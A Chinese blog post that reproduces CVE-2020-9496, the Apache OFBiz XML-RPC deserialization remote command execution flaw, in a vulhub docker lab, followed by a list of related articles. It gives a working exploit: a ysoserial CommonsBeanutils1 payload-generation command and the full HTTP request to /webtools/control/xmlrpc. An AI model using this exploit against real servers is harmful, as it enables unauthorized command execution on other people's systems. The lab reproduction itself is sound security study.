vulhub漏洞复现46_OfBiz

最新推荐文章于 2024-04-23 10:22:31 发布
最新推荐文章于 2024-04-23 10:22:31 发布
阅读量550 收藏 1
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122863783
版权

CVE-2020-9496_Apache OfBiz 反序列化命令执行漏洞

前言

Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。 OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。

漏洞详情

其17.12.04版本之前的XMLRPC接口存在一处反序列化漏洞,攻击者利用这个漏洞可以在目标服务器上执行任意命令。

漏洞环境

靶场:192.168.4.10_ubuntu

执行如下命令启动一个Apache OfBiz 17.12.01版本:

#docker-compose up -d

在等待数分钟后,访问`https://your-ip/myportal/control/main`查看到登录页面,说明环境已启动成功。

漏洞复现

由于默认情况下没有报错信息,所以使用[参考连接2](https://github.com/dwisiswant0/CVE-2020-9496)中给出的方法无法正确判断漏洞是否存在,还是需要通过执行反序列化来复现漏洞。

使用[ysoserial](https://github.com/frohoff/ysoserial)的CommonsBeanutils1来生成Payload:

```

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"

```

将base64后的payload替换并发送如下数据包:

```

POST /webtools/control/xmlrpc HTTP/1.1

Host: your-ip

Content-Type: application/xml

Content-Length: 4093

<?xml version="1.0"?>

<methodCall>

  <methodName>ProjectDiscovery</methodName>

  <params>

    <param>

      <value>

        <struct>

          <member>

            <name>test</name>

            <value>

              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64-payload]</serializable>

            </value>

          </member>

        </struct>

      </value>

    </param>

  </params>

</methodCall>

```

进入容器中,可见`touch /tmp/success`已成功执行:

Revenge_scan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
新手干货 Apache Ofbiz介绍+安装到使用
qq_38802742的博客
04-19 1万+
1.介绍(Introduction): OFBizisanApacheSoftwareFoundationtoplevelproject. 首先先介绍一下 广义 Apache Ofbiz,ApacheOFBiz全称是TheApacheOpenForBusinessProject。Open For Business(OFBiz)是一套基于通用架构的企业应用...
ofbiz 教程_配置ofbiz
03-13
ofbiz的获取与部署,主要用到了gradle 和 eclipse,注意:cmd部署时,需要一个较好的网络环境以下载gradle
vulnhub之Cherry(超级详细)
鲨鱼辣椒的博客
06-11 643
写在前面 在csdn上写文章大概也写了二十篇左右了,其实就文章本身还是有些问题,首先还是自己没有什么文笔,本来就是一些技术类的东西比较生硬,只能尽自己可能写的有趣一些,但主要还是要表达清楚自己的意思。也算锻炼自己写文章的能力,同时如果能够帮助到一些人那就更好啦。所以以后的文章我会尽可能的写的详细一些,如果是我自己也不太了解也会贴上我认为写的比较好的相关的文章。 信息搜集 渗透测试的第一步就是信息搜集,搜集到的信息的多少甚至就直接决定了你能不能拿下这个站。信息搜集也是大神和普通人拉开差距的地方(这话也不
Vue 基础(入门级)学习笔记(一)
yxx的博客
01-18 183
Vue 基础(入门级)学习笔记 学习前言 适合已经掌握了HTML、CSS、JavaScript、AJAX基础知识 可以使用vscode、sublime等工具,vscode可以下载Live Server插件便于网页实时展示效果(保存网页界面自动变化) [Vue.js教程文档](https://cn.vuejs.org/) 1. 导入开发版本的vue.js ```html ``` 2. 创建Vue实例对象,设置el属性和data属性 ```html {{ message }} {{ sch
[ vulhub漏洞篇 ] vulhub 漏洞集合(含漏洞文章连接)
最新发布
小司机的奥拓
04-23 1364
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部,欢迎持续订阅我也会不定期再中间更新文章链接目的:以 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
vulhub漏洞1
xhscxj的博客
05-23 1906
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
(二)vulhub专栏:Shiro漏洞汇总
云舒的博客
06-03 1851
Shiro漏洞汇总
ofbiz-birt.rar_ofbiz_ofbiz birt
09-20
OFbiz reporting with Birt
ofbiz_nutshell.rar_ofbiz_open
09-22
OFBiz Tutorial for Basics of Open for Business
ofbiz_springservice.zip
01-18
基于spring封装的ofbiz所有服务,使用spring security进行安全验证,可以方便的发布为微服务,同时实了一套直接使用ofbiz实体引擎操作ofbiz所有数据库表的spring应用框架设计
ofbiz开发框架建表语句 ofbiz_sql
03-31
ofbiz sql 表结构
ofbiz作为企业杂应用开发平台的要求
lijianhua1205的专栏,微信号 lijianhua1205
12-03 2275
ofbiz作为企业杂应用开发平台的要求 1 支持漂亮的服务端模版 企业杂应用,前端页面是非常多的,要是前后端分离开发,需要一个专门的前端团队,服务端模版则后台程序员可以前后台一体化开发,节约大量的人力成本和加快开发时间 2 集成消息中间件 ofbiz自身已经集成activemq,这对企业杂应用开发来说是足够了 3 支持杂的权限管理 支持对菜单 页面按钮 服务 和数据实体的权限定义,ofbiz只支持了部分的权限功能,需要扩展 4 支持集团化多分公司组织架构 5 使用分布式数据库 传统
vulhub靶场搭建及漏洞教程
热门推荐
Cwillchris的博客
03-25 1万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
CVE-2020-9496 Apache OFBiz XML-RPC反序列化漏洞
Shadow_DAI_990101的博客
08-23 2049
CVE-2020-9496 Apache OFBiz XML-RPC反序列化漏洞
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1469
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
Apache OFBiz XML-RPC远程代码执行漏洞(CVE-2023-49070)漏洞
qq_53733257的博客
12-11 1430
CVE-2023-49070 漏洞
ofbiz 开发环境搭建-简洁的步骤
weixin_38989540的博客
05-13 1123
简介 ofbiz 源码拉取,初始化,启动。最后使用eclipse启动,开发。 官方地址 官方hello world ofbiz 运行环境需要jdk1.8 源码拉取 git clone https://github.com/apache/ofbiz-framework.git ofbiz-framework 更改以mysql作为数据存储 1.编辑ofbiz-framework/framework/entity/config/entityengine.xml文件 找到以上位置改成[localmysql] 2
ofbiz_实体引擎
yangyaohua_sky的博客
01-10 2074
目  录 1.           背景.... 1 2.           OFBiz之Entity简介.... 1 3.           OFBiz实体配置.... 1 3.1          实体对应数据系统配置.... 1 3.2          实体代理(Entity Delegators). 1 3.3          数据源(datasourc
Apache OFBiz
06-03
Apache OFBiz是一个开源的企业资源规划(ERP)系统,它提供了一整套管理应用程序,包括客户关系管理(CRM)、供应链管理(SCM)、会计、库存管理、订单管理等等。 OFBiz使用Java编写,支持多种数据库和操作系统,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值